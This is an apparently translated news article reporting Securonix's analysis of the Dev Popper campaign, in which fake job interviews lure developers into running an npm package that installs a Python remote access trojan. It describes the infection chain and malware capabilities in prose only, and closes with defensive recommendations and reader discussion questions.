A new campaign, called Dev Popper, targets software developers with fake job interviews in an attempt to trick them into installing a remote Python Trojan (RAT). Developers are asked to perform supposedly maintenance-related tasks, such as downloading and running code from GitHub, in an effort to make the entire process legitimate. However, the threat actors’ goal is to get their targets to download malware that collects system information and allows remote access to the host. According to Securonix analysts, the campaign is likely orchestrated by North Korean cybercriminals, although the connections are not strong enough for attribution.
Social engineering is an advanced tactic used by cybercriminals to manipulate individuals into disclosing confidential information or taking actions they normally would not do. The attacker’s goal is to trick the user into unknowingly compromising themselves or their workplace. Unlike traditional hacking methods that rely on exploitation, social engineering targets human vulnerabilities by exploiting psychological manipulation. This method plays on fundamental human traits such as trust, fear or the desire to simply be useful.
In the case of the Dev Popper attack campaign that Securonix observed, another form of social engineering was observed; it involves targeting specific professional groups such as software developers. This technique, although not extremely widespread at the moment, is still relevant and Securonix points out that it has been reported several times in the past by North Korean cybercriminals.
In short, attackers set up fake job interviews for developers by pretending to be legitimate recruiters. During these fraudulent interviews, developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub. The software contained a malicious Node JS payload that, when executed, compromised the developer’s system.
This method is effective because it leverages the developer’s professional commitment and trust in the application process, where refusal to carry out the interviewer’s actions could jeopardize the job opportunity. Attackers tailor their approach to appear as credible as possible, often by imitating real companies and replicating real-life interview processes. This appearance of professionalism and legitimacy gives the target a false sense of security, making it easier to deploy malware without raising suspicion.
Multi-step infection chain
Attackers make contact pretending to be employers looking to fill software developer positions. During the interview, candidates are asked to download and perform what is presented as a standard coding task from a GitHub repository. The file is a ZIP archive containing an NPM package, which includes a README.md file as well as frontend and backend directories.
In the Backend directory is a single JavaScript file that, at first glance, appears to be a simple snippet of code using Mongoose, a Node.js package that allows modeling of MongoDB objects in an asynchronous environment.
However, a closer look reveals a huge line of highly obfuscated code when scrolling to the right. An example of the size of this line can be seen by looking at the scroll bar in the figure above.
Removing the JavaScript from imageDetails.js and putting it in its own file makes it a little easier to parse. The code is obfuscated using multiple layers of obfuscation, including base64 and variable substitutions.
Once the developer runs the NPM package, an obfuscated JavaScript file (imageDetails.js) hidden in the backend directory is activated, running curl commands through the Node.js process to download an additional archive (p.zi) from a server external.
The .npl file is technically a Python file, with no extension, and uses a starting point. to tell the operating system that it is a hidden file. Depending on the operating system settings, this file may or may not be hidden from user view.
The file contains a large base64 payload and uses a combination of string manipulation and decoding to execute the Python code hidden inside. Base64 encoding and XOR logic are used for the contents of the cached string. This is then executed as Python code using exec().
The archive therefore contains the payload for the next step, an obfuscated Python (npl) script that functions like a RAT.
Executing Python code
Securonix explains that the first string of decoded code runs and collects information about an infected computer’s system and network, then sends that data to a remote server:
- Operating system type
- the host name
- Operating system version
- Username of the connected user
- A unique identifier for the device (uuid) generated by hashing the MAC address and username.
The second decoded and executed chain is much longer than the first and contains many more features. Once executed, the script functions in the same way as a RAT (Remote Access Trojan), allowing the attacker to interact remotely with the victim’s machine. After analyzing the decoded part of the script, Securonix observed the following capabilities:
- Creating networks and sessions: Used for persistent connections: This feature allows you to establish persistent TCP connections, including structuring and sending data in JSON format.
- Interaction with the file system: Contains functions for browsing directories and filtering files based on specific extensions and exclude directories. It can also locate and potentially exfiltrate files that do not match certain criteria (such as file size and extension).
- Remote command execution: The script contains several functions that enable execution of system shell commands and scripts. These include browsing the file system and executing shell commands.
- Processing and transmission of data: Data encoding functionality over an established TCP connection. It manages the reception of data, the decoding of the different character codings and the management of transmission errors and timeouts.
- Exfiltration and download: For exfiltration, the Python script is capable of sending files to a remote FTP server with the ability to filter files based on their extension. Other features help automate this process by collecting data from various user directories such as Documents and Downloads.
- Saving the clipboard and keystrokes: The script includes functionality to monitor and exfiltrate clipboard contents and keystrokes.
Securonix recommendations
When it comes to social engineering attacks, it’s essential to maintain a security-focused mindset, especially in intense and stressful situations like job interviews. The attackers behind DEV#POPPER campaigns abuse this, knowing that the person on the other end of the line is very distracted and much more vulnerable. When it comes to prevention and detection, the Securonix Threat Research team recommends the following:
- Make people aware that they are targets of social engineering attacks, just as technology is exploited. It is essential to remain very vigilant and ensure continued safety, even in high stress situations, to prevent the problem.
- In case of code execution, malware storage directories should be monitored, especially script-related activities in globally writable directories. In the case of this campaign, the threat actors installed themselves in subdirectories found within the user’s %APPDATA% directory.
- Monitor the use of non-default scripting languages, such as Python, on terminals and servers that would not normally run them. This can be done by leveraging additional process-level logs, such as Sysmon and PowerShell, to broaden log detection coverage.
Conclusion
Although the perpetrators of the Dev Popper attack are not known, the tactic of using bait to infect people with malware is still widespread, so we should remain vigilant about the risks.
The researchers note that the method leverages the developer’s professional commitment and trust in the job application process, where refusal to carry out the interviewer’s actions could jeopardize the job opportunity, making it very effective. North Korean hackers have used the fake job offer tactic in numerous operations over the years to compromise their targets on various platforms.
Source: Securonix
And you ?
What is your opinion on using job postings as bait to spread malware? Do you think this tactic is effective and why?
How can developers protect themselves against such attacks? Do you have any specific tips for verifying the authenticity of job offers and interviews?
What steps do you think companies should take to increase candidate safety during the recruiting process?
What other social engineering methods have you encountered in the field of cybersecurity? Share your experiences or knowledge.
Do you think attribution of attacks to specific threat actors is important? Why or why not ?
